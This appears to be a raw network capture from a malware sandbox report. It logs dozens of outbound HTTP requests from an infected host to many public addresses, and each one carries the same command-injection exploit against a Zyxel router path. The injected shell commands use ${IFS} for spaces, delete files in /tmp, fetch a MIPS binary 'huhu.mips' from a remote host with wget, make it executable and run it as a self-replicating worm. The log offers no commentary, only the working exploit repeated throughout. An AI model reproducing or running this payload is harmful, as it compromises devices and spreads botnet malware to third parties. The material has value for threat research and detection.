                                      Jan 19, 2024 17:29:23.599554062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2323192.168.2.1454810164.228.67.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599572897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2324192.168.2.1449114216.213.234.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599642992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2325192.168.2.146014668.73.181.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599659920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2326192.168.2.1456864200.193.211.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599740982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2327192.168.2.1438066172.237.139.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599749088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2328192.168.2.1434022181.47.17.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599778891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2329192.168.2.145147619.28.116.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599838018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2330192.168.2.1451270192.37.55.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599885941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2331192.168.2.143321037.20.30.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599925041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2332192.168.2.1439420103.75.147.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599956989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2333192.168.2.1459952117.164.86.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599983931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2334192.168.2.143948497.57.188.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600008011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2335192.168.2.143922440.40.60.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600061893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2336192.168.2.144316697.241.22.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600112915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2337192.168.2.1446714152.205.215.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600158930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2338192.168.2.1456582138.243.192.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600178003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2339192.168.2.143714458.19.108.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600203037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2340192.168.2.1443734140.85.132.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600253105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2341192.168.2.1457738152.96.60.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600296021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2342192.168.2.14446804.26.0.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600334883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2343192.168.2.1443558206.85.158.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600354910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2344192.168.2.144411037.39.111.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600389957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2345192.168.2.1452774180.215.121.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600425959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2346192.168.2.145402644.185.105.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600457907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2347192.168.2.145218889.245.232.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600493908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2348192.168.2.1459822183.67.200.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600512028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2349192.168.2.1455388216.81.232.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600548983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2350192.168.2.143714668.189.102.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600621939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2351192.168.2.145109261.207.102.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600658894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2352192.168.2.1452154177.185.24.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600701094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2353192.168.2.1454718157.101.98.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600758076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2354192.168.2.1438284172.164.10.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600802898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2355192.168.2.1458858210.62.173.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600827932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2356192.168.2.145375882.207.247.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600868940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2357192.168.2.1441938169.161.117.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600900888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2358192.168.2.1441950170.247.100.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600936890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2359192.168.2.1455920160.160.118.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.600991011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2360192.168.2.145557467.75.1.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601025105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2361192.168.2.1433116172.48.227.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601062059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2362192.168.2.1440272167.134.11.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601099968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2363192.168.2.145008618.222.179.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601130962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2364192.168.2.1456778167.15.226.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601202965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2365192.168.2.1444390122.202.124.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601252079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2366192.168.2.145506814.125.101.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601281881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2367192.168.2.144188478.181.242.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601326942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2368192.168.2.1452856105.196.70.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601367950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2369192.168.2.145166889.150.164.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601392984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2370192.168.2.144691244.47.90.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601443052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2371192.168.2.1454042169.119.17.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601484060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2372192.168.2.1448934134.122.110.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601525068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2373192.168.2.145774027.185.159.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601557970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2374192.168.2.1443408101.254.93.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601597071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2375192.168.2.143748665.33.124.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601639986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2376192.168.2.1448426188.185.59.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601701021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2377192.168.2.1451622134.165.218.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601742029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2378192.168.2.1442888213.243.111.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601787090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2379192.168.2.1440526170.181.140.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601810932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2380192.168.2.1446970173.9.226.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601859093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2381192.168.2.1448338126.119.138.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601900101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2382192.168.2.144847851.3.35.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601933956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2383192.168.2.145498280.121.247.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.601985931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2384192.168.2.1436388178.7.105.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602013111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2385192.168.2.1437798164.207.13.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.602046013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2386192.168.2.144979683.127.3.152443
                                      TimestampBytes transferredDirectionData
